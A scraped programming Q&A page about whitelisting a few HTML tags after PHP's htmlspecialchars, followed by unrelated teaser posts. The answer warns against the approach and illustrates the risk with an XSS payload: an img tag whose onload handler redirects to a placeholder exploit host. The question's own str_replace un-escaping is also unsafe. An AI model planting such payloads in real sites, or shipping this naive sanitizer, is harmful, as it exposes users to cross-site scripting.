php - htmlentities to allow <a> links - How? -


in order make inputs safe, i'm using htmlentities in php:

$input = $_post['field']; $result = htmlspecialchars($input);

this works, realized in inputs, need allow basic markup <b> , <i>, copyright logos , basic stuff user. started doing this:

$result = $_post['ftext']; $presanitize = htmlspecialchars($result); $newftext = str_replace(array("&lt;i&gt;", "&lt;b&gt;", "&lt;/i&gt;", "&lt;/b&gt;", "&copy;", "&quot;", "&lt;a&gt;", "&lt;&#47;a&gt;"),  array("<i>", "<b>", "</i>", "</b>", "©", '"', "<a>", "</a>"), $presanitize);

now come main problem: how allow things <a> , <img> don't have tag , don't know comes inside of it?

i can replace , because it's , if replace , wont work i'll have lots of stuff (<a href="http://link.com">text</a>) inside of it. should do? in advance.

the simple answer is: don't. that's part of reason why many popular forum systems use kind of markup that's not plain html. otherwise people can , nasty stuff way or another.

<img src="http://example.com/random-pic.jpg" onload="location.href='http://some.nasty.page/exploit';"/>

but can remove event tags? of course, keep date browsers support , quirks? can outsmart everyone?

if still want it, documented, tested, , used library or script provides functionality. php has built in, it's barebone. keywords "php html sanitizer" or similar.

personally i'd recommend support markdown or bbcode syntax (again: there many ready use snippets , libraries available). don't reinvent wheel unless have to.


-

Comments

Post a Comment

Popular posts from this blog

php - Permission denied. Laravel linux server -

when try register , send email user got error. working till yesterday. today gives me , cant figure out why. way on local testing work's. i'm stuck. please errorexception in compiled.php line 7512: file_put_contents(/var/www/html/storage/framework/views/53de219dee4f11a2db4f64a2c574ad02db5613f4.php): failed open stream: permission denied in compiled.php line 7512 @ handleexceptions->handleerror('2', 'file_put_contents(/var/www/html/storage/framework/views/53de219dee4f11a2db4f64a2c574ad02db5613f4.php): failed open stream: permission denied', '/var/www/html/bootstrap/cache/compiled.php', '7512', array('path' => '/var/www/html/storage/framework/views/53de219dee4f11a2db4f64a2c574ad02db5613f4.php', 'contents' => 'please activate account clicking on following link. <a href="<?php echo e(route('auth.activate', $token)); ?>"><?php echo e(route('auth.activate', $token)); ?...
Read more

google bigquery - Delta between query execution time and Java query call to finish -

context our container cluster located @ us-east1-c we using following java library: google-cloud-bigquery, 0.9.2-beta our dataset has around 26m rows , represents ~10g all of our queries return less 100 rows grouping on specific column question we analyzed last 100 queries executed in bigquery, these executed in 2-3 seconds (we analyzed calling bq --format=prettyjson show -j jobid , end time - creation time). in our java logs though, of calls bigquery.query blocking 5-6 seconds (and 10 seconds not out of ordinary). explain systematic gap between query finish in bigquery cluster , results being available in java? know 5-6 seconds isn't astronomic, curious see if normal behaviour when using java bigquery cloud library. i didn't dig point analyzed outbound call using wireshark. our tests executed in our container cluster (kubernetes). code queryrequest request = queryrequest.newbuilder(sql) .setmaxwaittime(30000l) .setuselega...
Read more

python - Pandas two dataframes multiplication? -

i have 2 data frames (a , b) a: column 1, column 2, column 3 0.1 0.5 0.7 b: row 1 5 row 2 6 row 3 7 how perform multiplication like (0.1)*5, (0.5)* 6, , (0.7)*7? in other words, how multiply value in first row of b value in first column of a, second row of b value in second column of b, , etc? you want multiply values without respect whether rows or columns. pd.series(a.values.ravel() * b.values.ravel()) 0 0.5 1 3.0 2 4.9 dtype: float64
Read more